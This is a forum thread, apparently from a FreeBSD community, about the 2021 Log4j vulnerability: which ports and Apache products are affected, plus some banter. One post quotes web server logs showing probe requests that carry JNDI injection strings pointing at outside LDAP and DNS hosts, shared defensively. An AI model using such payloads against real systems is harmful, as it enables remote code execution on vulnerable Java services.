critical vulnerability in devel log4j

the myth of open source => more eyes => more secure busted again
See now I've never seen it as "equals" (more eyes equals more secure). I've always taken it to be
"more eyes is potentially more secure". Similar to crypto algorithms.
Of course in software, there must be eyes willing to look for the problem, they must be able to see the potential problem and most important, they need to be looking in the right spot.

Is this thread about one of the most serious vulnerabilities this year now derailed into off-topic land because of a grudge against an init system that the OS we're gathered here for doesn't even support?

if i understood correctly this bug is at least 4 years old, since ver 2.10
the myth of open source => more eyes => more secure busted again
It's way older than that. Introduced in Log4j 2.0. I can be a real bore and go on about the history of Java logging in the unlikely event that you're interested.

It's way older than that. Introduced in Log4j 2.0. I can be a real bore and go on about the history of Java logging in the unlikely event that you're interested.
Hmm. "Ask Jose about Java logging or go get some teeth pulled? Tough decision" :)

Hmm. "Ask Jose about Java logging or go get some teeth pulled? Tough decision" :)
More like "I was run over by a logging truck and they need to fix up my n+1 broken bones without anestetics due to the pandemic. Using rusty spoons. I think the talk about java logging might numb my mind enough for that..."

Reactions: mer
More like "I was run over by a logging truck and they need to fix up my n+1 broken bones without anestetics due to the pandemic. Using rusty spoons. I think the talk about java logging might numb my mind enough for that..."
One thought: Is the logging truck loaded with hardwoods or softwoods? Big difference between oak and pine :)

Code:
185.100.87.174 - - [14/Dec/2021:12:12:26 +0200] "GET /?a=%24%7Bjndi%3Aldap://193.3.19.159%3A53/c%7D HTTP/1.1" 200 290

It's time to add some more IPs to my FW :) 185.100.87.0/24

Those security companies keep probing the net for this exploit.
Code:
45.83.66.109 - - [13/Dec/2021:06:33:59 +0200] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 196

One thought: Is the logging truck loaded with hardwoods or softwoods? Big difference between oak and pine :)
Yes. 40 tons of oak hurt you with a lot more style than 40 tons of pine .. ;)

Reactions: mer
Just to be clear, is this really only an issue if the devel/log4j port is installed? A vanilla apache install is fine? Or is it buried somewhere inside a default apache install?

Is there a master list of affected ports?

Maybe I'm not looking at the problem correctly?

devel/log4j is not vulnerable to this exploit (it is to others)
you need to have something based on java in the 1st place
so just www/apache24 wont be vulnerable

Maybe I'm not looking at the problem correctly?
The Apache Web server is written in C and is not affected. Any Apache project written in Java may be affected. Any non-Apache project written in Java may be affected.

Is there a master list of affected ports?

Just to be clear, is this really only an issue if the devel/log4j port is installed?
No, not in this case. The issue is only with the 2.x versions of log4j. The version in ports is an old one, still 1.x. That's not vulnerable.

A vanilla apache install is fine? Or is it buried somewhere inside a default apache install?
www/apache24 is officially called Apache httpd. It is not affected by this (not a Java application). Apache creates more software besides httpd.

Any Apache project written in Java may be affected. Any non-Apache project written in Java may be affected.
Yes. I would say, any Java project may be affected. The vulnerable log4j 2.x version could be embedded in some application without you being aware of it. The application must be written in Java (that log4j is a Java class) though.

Thanks! Luckily I have no idea what most of those affected packages are.

pkg audit is coming up with nothing, which is at least not bad news!

Back